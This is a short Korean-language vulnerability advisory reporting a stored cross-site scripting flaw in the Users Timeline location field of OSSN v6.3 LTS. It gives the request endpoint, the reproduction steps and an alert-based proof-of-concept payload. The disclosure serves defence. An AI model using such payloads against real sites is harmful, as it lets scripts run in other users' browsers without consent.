
OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS에서 Users Timeline 모듈을 통해 저장형 교차 사이트 스크립팅(XSS) 취약점이 발견되었습니다.
OpenTeknik LLC OSSN 오픈소스 소셜 네트워크 v6.3 LTS는 Users Timeline 모듈을 통해 저장형 크로스 사이트 스크립팅(XSS) 취약점이 발견되었습니다.
공격자는 저장형 XSS를 악용하기 위해 Users Timeline에 게시물을 작성하고 위치 입력란에 XSS 페이로드를 삽입해야 합니다. 제출 직후 XSS 페이로드가 실행됩니다.
http://ip_address:port/ossn/u/{username}
POST /ossn/action/wall/post/u?ossn_ts=1656419317&ossn_token=580bcf1b98fec62baecd2e15b7c4c03173f59226623258b968a316f893e8cbf1
``
<BODY ONLOAD=alert('Grim-The-Ripper-Team-by-SOSECURE-Thailand')>
``
OSSN v6.3 LTS (https://github.com/opensource-socialnetwork/opensource-socialnetwork/releases/tag/6.3)
Google Chrome Version 102.0.5005.115 (Official Build) (x86_64)
:shipit: Grim The Ripper Team by SOSECURE Thailand
참고 자료: